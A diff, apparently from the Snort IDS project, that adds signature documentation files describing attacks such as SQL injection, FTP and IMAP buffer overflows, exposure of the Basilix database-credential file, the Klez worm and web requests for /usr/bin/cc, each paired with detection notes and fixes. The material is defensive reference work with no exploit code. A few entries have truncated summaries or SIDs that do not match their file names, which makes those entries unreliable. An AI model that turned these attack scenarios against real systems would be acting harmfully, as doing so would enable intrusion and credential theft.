+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000857.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000857
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "ip" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "ip" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2031.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2031
+
+--
+Summary:
+The rpc.ypasswd service is used to update user information remotely. 
+This service should not be available outside the local area network, 
+external source.
+
+--
+Impact:
+This may be an intelligence gathering activity on available rpc services
+on a machine connected to external resources. The possibility also 
+exists that an attacker may already have gained access to a NIS server 
+and thus all resources connected to that host.
+
+--
+Detailed Information:
+A vulnerability exists in some versions of the rpc.ypasswd service that
+can lead to a remote root compromise of a vulnerable host. This activity
+may be an intelligence gathering exercise to ascertain wether or not the
+host is vulnerable to this attack.
+
+This activity may also indicate a possible compromise of a NIS server 
+via a legitimate user account the attacker has previously garnered. 
+Compromise of a master NIS server may present the attacker with easy 
+access to all NIS resources the machine is connected to.
+
+--
+Affected Systems:
+All systems running the rpc.ypasswd service.
+
+--
+Attack Scenarios:
+The attacker can make a request to update user information via 
+rpc.ypasswd.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+SANS:
+http://www.sans.org/rr/unix/NIS.php
+http://www.sans.org/rr/unix/sec_solaris.php
+
+--
--- /dev/null
+++ b/doc/signatures/1976.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1976
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow vulnerability associated with CesarFTPD FTP server DELE command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of arbitrary commands with system privileges.
+
+--
+Detailed Information:
+CesarFTPD offers FTP servers for Windows hosts. A vulnerability exists with the DELE command that can cause a buffer overflow and permit the execution of arbitrary commands with system privileges. The buffer overflow can be caused by supplying an overly long argument to the DELE command.
+
+--
+Affected Systems:
+	Hosts running CesarFTP 0.98b.
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the DELE command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0826
+
+Bugtraq:
+http://www.securityfocus.com/bid/2972
+
+--
--- /dev/null
+++ b/doc/signatures/1977.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1977
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/295.txt
@@ -0,0 +1,61 @@
+SID:
+295
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd 
+server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead 
+to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55
+	University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/1526.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+1526
+
+--
+Summary:
+This event is generated when an attempt is made to access the file sendmail.inc on a webserver running Basilix webmail.
+
+--
+Impact:
+Medium - Password disclosure: Depending if the attacker can use this login credentials to authenticate directly to a mysql database. Many Sun Cobalt Linux servers use Basilix webmail
+
+--
+Detailed Information:
+A webserver usually sends files in the webroot to an anonymous user without further processing. PHP scripts often include files (which contains configuration variables / functions etc.) that are not stored using a suffix that prevents the webserver sending them in clear text. ".inc" and ".class" suffix are not a handled by CGI properly and the file "sendmail.inc" is sent to the attacker. /inc/mysql.class can also be accessed and this would lead to a mysql user/password disclosure.
+
+Basilix is a webmail PHP script. Features are nice but it has some vulnerabilities (old versions).
+
+An attacker can access sendmail.inc file to obtain MySQL login and use it for further attacks.
+
+--
+Attack Scenarios:
+An attacker gets mysql.class containing database login credentials. If the webserver is shared by multiple users, the attacker which is also user for instance, can connect to the database server using the login provided by mysql.class file and modify the database. Often the password doesn't differ from FTP login, HTTP user authentication, etc. because the authentication is centralised by the OS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Sendmail.inc file doesn't exist or is handled by CGI which results probably in no output when an attacker tries to access the file.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Update Basilix script (www.basilix.org)
+
+Check files which contain php code for a suffix that is handled by the webserver CGI, else the webserver sends this file plaintext to an attacker
+
+Workaround: register .inc and .class in the same way .php or .php3  .php4 are registered.
+Note: .class is used by java applets usually
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional Snort documentation contributed by unknown
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1445.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1445
+
+--
+
+Summary:
+This event is generated when an attempt is made to retrieve a file 
+called 'file_id.diz'
+
+--
+
+Impact:
+Such files are sometimes used on 'warez' sites to describe the contents 
+of a directory
+
+--
+
+Detailed Information:
+A lot of warez sites use small files called 'file_id.diz' to 
+describe the name of the release and the group which released the 
+software/material.
+
+--
+
+Affected Systems:
+Machines running ftp servers.
+
+--
+
+Attack Scenarios:
+After finding a ftp server containing illegal contents, the user 
+downloads the file 'file_id.diz' to verify the contents of a directory, 
+and then, if if the attacker chooses, other files in that directory.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+Many shareware/freeware sites also use the 'file_id.diz' files to 
+describe the contents of their packages.
+
+--
+
+False Negatives:
+Warez sites might not use 'file_id.diz' files to describe the 
+directories, or might rename them.
+
+--
+
+Corrective Action:
+Verify the location and contents of the 'file_id.diz' files on your ftp 
+server and take appropriate action.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1701.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1701
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2424.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2424
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/322.txt
@@ -0,0 +1,70 @@
+Rule:   
+
+--
+Sid: 322
+
+-- 
+Summary: 
+This event is genrated when an attempt is made to query the finger daemon to ascertain a list of usernames on a system.
+
+-- 
+
+Impact: 
+Information gatthering, the attacker may obtain the list of some accounts existing on the victim system as a prelude to further compromize.
+
+--
+Detailed Information:
+
+The rule is triggerred when an attempt to use a search feature in
+"cfingerd" version of a finger daemon is attempted. The search feature
+allows the attacker to obtain the lists of accounts existing on the
+target system by issuing a specially crafted finger request to
+"search" for information. Knowing the list of accounts might
+facilitate a password guessing attacks, email attacks or other abuse.
+
+--
+
+Attack Scenarios: an attacker learns that "guest" account exists and
+has never been used. He then guesses that the password for this
+account and logs in to the system remotely using telnet.
+
+-- 
+
+Ease of Attack: 
+Simple, no exploit software required
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Look for other IDS events involving the same IP addresses. 
+
+Look for suspicious logins to the affected system.
+
+Disable the finger daemon or apply a vendor patch that removes the vulnerability
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS375
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0259
+
+--
--- /dev/null
+++ b/doc/signatures/548.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 
+547
+
+--
+Summary: 
+This event is generated when an attempt is made to create a directory name that begins with a period on an FTP server.
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to create a directory name that begins with a period on an FTP server, possibly in preparation to store unauthorized files.
+
+
+--
+Detailed Information: 
+An attacker may attempt to create a hidden directory name that begins with a period on an FTP server .  This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software.
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may attempt to create a hidden directory name that begins with a period to store unauthorized files.
+
+--
+Ease of Attack: 
+Simple
+
+--
+False Positives:
+It is remotely possible that an authorized directory exists with a name that begins with a period.
+
+--
+False Negatives: 
+Hidden directories other than those with a name that begins with a period may be created to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1800.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+1800
+
+--
+Summary:
+This event is generated when an incoming email containing the Klez worm is detected.
+
+--
+Impact:
+System compromise and further infection of target hosts.
+
+--
+Detailed Information:
+W32/Klez.h@MM exploits the vulnerability in Microsoft Internet Explorer (ver 5.01 or 5.5 without SP2), enabling it to execute email attachments.
+
+Once executed, it can unload several processes including Anti-virus programs.
+
+The worm is able to propagate over the network by copying itself to network shares (assuming sufficient permissions exist). Target filenames are chosen randomly, and can have single or double file extensions.
+
+--
+Affected Systems:
+	Microsoft Internet Explorer (ver 5.01 or 5.5 without SP2)
+
+--
+Attack Scenarios:
+This virus can be considered a blended threat. It mass-mails itself to email addresses found on the local system, then exploits a known vulnerability, spreads via network shares, infects executables on the local system.
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Certain binary file email attachments can trigger this alert.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor suppled patches.
+
+Block incoming attachments with .bat, .exe, .pif, and .scr extensions 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.klez.h@mm.html
+
+--
--- /dev/null
+++ b/doc/signatures/1343.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted cc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The cc
+command is the GNUproject's C and C++ compiler used to compile C and
+C++ source filesinto executable binary files. The attacker could
+possibly compile aprogram needed for other attacks on the system or
+install a binaryprogram of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains
+'/usr/bin/cc'in theURI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside ofit's designated web root or cgi-bin. This command may also
+be requested on acommand line should the attacker gain access to the
+machine. Wheneverpossible, sensitive files and certain areas of the
+filesystem shouldhave the system immutable flag set to prevent files
+from being addedto the host. On BSD derived systems, setting the
+systems runtimesecurelevel also prevents the securelevel from being
+changed. (note:the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/106-1.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+106-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically fragmented 
+rpc records were detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2800.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2800
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure rename_shadow_column_group
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000412.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000412
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1694.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1694
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2503.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2503
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2075.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2075
+
+--
+Summary:
+using the upload.php script.
+
+--
+Impact:
+Unauthorized upload of files to a server.
+
+--
+Detailed Information:
+Arbitrary files can be uploaded to a server running vulnerable versions 
+of Mambo Site Server due to laxe checking in the scripts controlling 
+uploading of files.
+
+The scripts perform checks for certain file extensions but do not 
+prevent the upload of files with image extensions.
+
+--
+Affected Systems:
+	Mambo Mambo Site Server 4.0.10, 4.0.11 and 4.0.12 BETA
+
+--
+Attack Scenarios:
+The attacker can upload malicious scripts and executable files by 
+appending a valid extension used for an image file.
+
+The attacker can also use the server to store files of his choosing.
+
+--
+Ease of Attack:
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest version of Mambo Site Server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6572
+
+--
--- /dev/null
+++ b/doc/signatures/2080.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2080
+
+--
+Summary:
+number for the rpc service lockd.
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service lockd.
+
+If a user connects to port 1024 being used by the rpc service lockd, a 
+denial of service can be issued by supplying random input to the 
+service.
+
+--
+Affected Systems:
+	Debian Linux 2.1, 2.2 pre potato and 2.2
+	MandrakeSoft Linux Mandrake 6.0, 6.1 and 7.0
+	RedHat Linux 6.0 sparc, i386 and alpha
+	RedHat Linux 6.1 sparc, i386 and alpha
+	RedHat Linux 6.2 sparc, i386 and alpha
+
+--
+Attack Scenarios:
+The attacker needs to send random data to port 1024 used by nlockmgr.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the system.
+
+Upgrade the software to the latest non vulnerable version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1372
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0508
+
+--
--- /dev/null
+++ b/doc/signatures/2439.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2439
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Real Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2686.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2686
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
